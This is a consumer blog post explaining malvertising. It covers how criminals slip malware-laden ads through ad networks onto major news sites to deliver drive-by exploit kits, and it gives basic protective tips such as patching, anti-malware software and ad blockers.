Have you ever heard the song Flagpole Sitta by Harvey Danger from back in the 90’s? It had this brilliant line in it; “Paranoia, paranoia, everybody’s coming to get me”. We like to think that people who assume that the whole world is out to get them are well, just a tad …paranoid. But in the digital realm it sure does seem like Harvey was tapping into something very true.
Malvertising is one of those cases in which, yup, they really are out to get you. Well, not you in specific – but everybody, everywhere. Malvertising, a favorite tactic of hackers and scammers is a simple yet highly orchestrated attack method, which causes good people’s innocent websites to become dealers of all sorts of malware, including zero-day attacks, ransomware, banking trojans and more. There are four basic players in any malvertising situation and in order for the cyber criminal to pull off the attack things have to run in a pretty choreographed manner .
The four players in any malvertising campaign
The bad guy – The most important part of any malvertising campaign is the bad guy. He creates fake ads that look real but are filled with a malware-laden payload. He then takes that “ad” and sells it to a middle-man, or the ad exchange or ad network by posing as a credible business.
The ad exchange or ad network – Whenever there are ads on websites, they have been placed there by ad exchange networks who are paid by advertisers to display ads on ad supported sites. The bad guy submits a seemingly-innocent but really malware-filled “ad” to the network or exchange and the exchange, not knowing that the ad is filled with malware serves it up to any ol’ website they distribute their ads to. According to Digiday.com “The problem is that billions of ad impressions flow through exchanges every day from millions of publishers, so it’s almost impossible to keep to track of who’s selling and buying what. That means buyers can never be exactly sure where their impressions might show up. And sellers can never be entirely sure who’s buying them.” In other words, there is no practical way for these exchanges to make sure that the ads they place don’t contain malware.
That said, certain ad exchanges are working on creating protocols regarding from whom they accept ads and most use anti-malware solutions to route out what they can, which works to a certain degree. But doesn’t really cinch the issue.
The website – Websites such as Forbes.com, Yahoo.com, The New York Times, Reuters, Jamie Oliver.com and countless other big name website have been fed malware-laden ads. In practicality, this means that a simple visit to NYT.com could fill a computer with malware in a drive-by attack and it really has nothing to do with the website itself – They were just a means of transporting the rotten wares, like the high speed bullet train a conman jumps on to get from London to Paris to pull off his crime – It sure aint the train’s fault.
The victim – So let’s say you wanted to catch up on the news. “Hmmm. I think I’ll check out what the Huffpost has to say”– so you meander over to the Huffington Post. While you’re on the site, you barely notice it, but there is an ad for something, a car or perfume, or anything actually. That ad then redirects you to a page (often times invisible to the surfer) that hosts an exploit kit which looks for vulnerabilities, or holes due to unpatched software or updates that have not been installed. If it finds these holes, it essentially drops the malware into the holes and BAM! You’ve got malware!
This is a typical malvertising scenario and it happens all the time- and it’s doing huge damage, estimated to be in the billions by cyber security firms. And in fact, incidents of malvertising increased by 260 percent from 2014 to 2015 and is set to surpass those numbers in the remainder of 2016. And it’s easy to see why it’s a favorite method – for just a few dollars, a criminal can place an ad on a website they gets hundreds of millions of impressions. If only 10 percent of the viewers do indeed have the vulnerability that particular exploit needs to run, the criminal is still making off like, well, a bandit.
There are some things you can do to protect yourself from malvertising, making sure your next trip to Yahoo or NYT.com ( or whatever website it happens to be that is serving up the infected ads this particular time around) is actually safe:
- Update and patch all software and operating systems. The holes caused by unpatched and unupdated software are just about the greatest thing since sliced bread to a hacker. Close them before they get the chance to exploit them.
- Install a reputable anti-malware program like RCS to block malware that blocks the malware that malvertising schemes attempt to serve up.
- Use an ad blocker – this is a bit of a touchy topic as blocking ads takes money away from legit advertisers. On the other hand, if there is no ad, there’s no malvertising… we’ll let you ponder this point and decide how you want to proceed.
While malvertising is not new, it’s just another growing malware distribution method you need to be aware of. Thankfully you aren’t fully defenseless and if you take the right measures, you don’t need to be all that paranoid… or maybe that’s not the worst thing in this crazy world. If a bit of paranoia keeps your software patched and keeps you from doing dumb stuff on the internet, well to that we say, paranoia paranoia, they really are coming to get you, so keep it up !